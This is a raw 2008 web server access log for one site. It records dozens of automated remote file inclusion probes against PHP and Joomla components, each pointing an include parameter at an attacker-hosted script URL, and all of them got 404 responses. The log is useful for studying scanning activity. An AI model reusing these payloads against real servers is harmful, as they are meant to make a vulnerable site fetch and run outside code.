213.198.106.65 - - [19/Feb/2008:05:17:56 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:17:56 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:05:17:56 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:17:56 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:17:57 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:17:59 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:17:59 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:17:59 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:18:00 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:18:01 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:18:02 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:18:02 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:18:03 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:18:03 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:18:04 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:18:05 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:18:05 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:18:05 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:18:06 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:18:06 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:18:10 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:18:10 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:05:18:12 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:05:18:12 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:18:13 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:05:18:13 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:05:18:14 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:05:18:15 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:05:18:15 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:05:18:15 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:05:18:15 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:05:18:15 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.172.34.237 - - [19/Feb/2008:05:18:15 -0800] "GET /logs/access.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.237 - - [19/Feb/2008:05:18:15 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.237 - - [19/Feb/2008:05:18:16 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.106.65 - - [19/Feb/2008:05:18:17 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:18:17 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:18:18 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:18:20 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:18:20 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:18:20 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:18:20 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:18:20 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:18:23 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:18:23 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:18:24 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:18:27 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:18:28 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.26.35 - - [19/Feb/2008:05:18:31 -0800] "GET /bikes/dteel/?N=D HTTP/1.0" 200 9362 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:18:32 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:18:33 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:18:33 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:18:33 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:18:33 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:18:34 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:18:34 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:18:34 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:18:34 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:18:34 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:18:34 -0800] "GET /logs/access_080120.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:18:34 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:18:34 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:18:34 -0800] "GET /logs/access_080120.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:18:34 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:18:34 -0800] "GET /logs/access_080120.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:18:35 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:18:35 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:18:35 -0800] "GET /logs/access_080120.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:18:36 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:18:37 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:18:43 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:18:58 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:18:58 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:19:01 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:19:06 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:19:09 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.88.23.149 - - [19/Feb/2008:05:19:11 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.stempel-immobilien.de/images/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
85.88.23.149 - - [19/Feb/2008:05:19:11 -0800] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.stempel-immobilien.de/images/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:19:14 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:19:14 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:19:14 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:19:14 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:19:15 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:19:16 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:19:16 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:19:17 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:19:20 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.70.113.10 - - [19/Feb/2008:05:19:22 -0800] "GET /logs//update/update9.php?lang=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
80.70.113.10 - - [19/Feb/2008:05:19:23 -0800] "GET //update/update9.php?lang=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
89.111.176.90 - - [19/Feb/2008:05:19:27 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.piesse.org/koma/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [19/Feb/2008:05:19:27 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.piesse.org/koma/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [19/Feb/2008:05:19:28 -0800] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.piesse.org/koma/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:05:19:43 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:20:06 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:20:07 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:20:09 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.11.243 - - [19/Feb/2008:05:20:12 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.206.72.201 - - [19/Feb/2008:05:20:26 -0800] "GET /logs/access_080120.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [19/Feb/2008:05:20:26 -0800] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [19/Feb/2008:05:20:27 -0800] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.198.63.21 - - [19/Feb/2008:05:20:59 -0800] "GET /logs/access_071225.log//errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.206.72.201 - - [19/Feb/2008:05:21:00 -0800] "GET /logs/access_080201.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:05:21:01 -0800] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://oliveyoursenses.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:05:21:01 -0800] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://oliveyoursenses.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:05:21:01 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://oliveyoursenses.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.7.68 - - [19/Feb/2008:05:21:15 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
